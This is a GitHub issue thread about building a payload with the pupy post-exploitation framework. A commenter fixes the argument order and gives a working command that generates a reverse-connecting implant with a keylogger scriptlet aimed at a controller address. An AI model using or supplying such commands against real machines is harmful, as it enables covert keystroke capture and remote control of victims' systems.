### ISSUE TITLE
scriplet issue

### ISSUE THREAD

**Issue by horllste** [n1nj4sec/pupy#444]
please i need help building pupy with scriplets, i demo with scriplets usage will be appreciated

./pupygen.py connect --host 192.168.178.1:7777 -s keylogger
 
that dont seems to work
thanks

**Comment by Hacksawfred3232** [comment]
Could you please specify the error you are getting with this? I think i may know the problem with this but i need to be sure.

**Comment by horllste** [comment]
root@sect:~/pupy/pupy# ./pupygen.py connect --host 192.168.178.1:7777 -s keylogger
usage: connect [-h] --host <host:port>
               [-t {obfs3,http,tcp_cleartext,rsa,udp_secure,ssl,ec4,scramblesuit,udp_cleartext,ssl_rsa}]
               ...
root@sect:~/pupy/pupy# ./pupygen.py connect --host 192.168.178.1:7777 -s keylogger -t http
usage: connect [-h] --host <host:port>
               [-t {obfs3,http,tcp_cleartext,rsa,udp_secure,ssl,ec4,scramblesuit,udp_cleartext,ssl_rsa}]
               ...
root@sect:~/pupy/pupy# ./pupygen.py connect --host 192.168.178.1:7777 -s KEYLOGGER
usage: connect [-h] --host <host:port>
               [-t {obfs3,http,tcp_cleartext,rsa,udp_secure,ssl,ec4,scramblesuit,udp_cleartext,ssl_rsa}]
               ...
root@sect:~/pupy/pupy# ./pupygen.py connect --host 192.168.178.1:7777 -s keylogger
usage: connect [-h] --host <host:port>
               [-t {obfs3,http,tcp_cleartext,rsa,udp_secure,ssl,ec4,scramblesuit,udp_cleartext,ssl_rsa}]


thats what i got each time.

**Comment by Hacksawfred3232** [comment]
Aha! That was what i was expecting. From when i tried this piece of software myself, i learnt that pupygen.sh has a structure to its command that you need to follow. Let me put in the note very quickly that i made just to remind myself.
`This is the structure used for the pupygen command
./pupygen <options> <launcher type> <launcher type augments>
DO NOT MIX UP THE STRUCTURE FOR THIS COMMAND! OTHERWISE THE PAYLOADS FROM THIS PROGRAM WILL FAIL!
NOTE THAT SCRIPTLETS BELONG TO OPTIONS! NOT THE LAUNCHER TYPE ARGUMENTS!`
So the command you got right now:
`./pupygen.py connect --host 192.168.178.1:7777 -s keylogger`
would be become this:
`./pupygen.py -s keylogger connect --host 192.168.178.1:7777`

But note this is still flawed because previous testing showed a bug that required the arguments to be all one "word" as per arguments for the connect payload. And you have not included a transport for the connect payload to use. So the command would be really this:
`/pupygen.py -s keylogger connect --host=192.168.178.1:7777 -t=ssl`
Hope this helps. Might as well ping @n1nj4sec to let him know of this so he could at least add the note that i made.

**Comment by horllste** [comment]
thanks man, you made my day
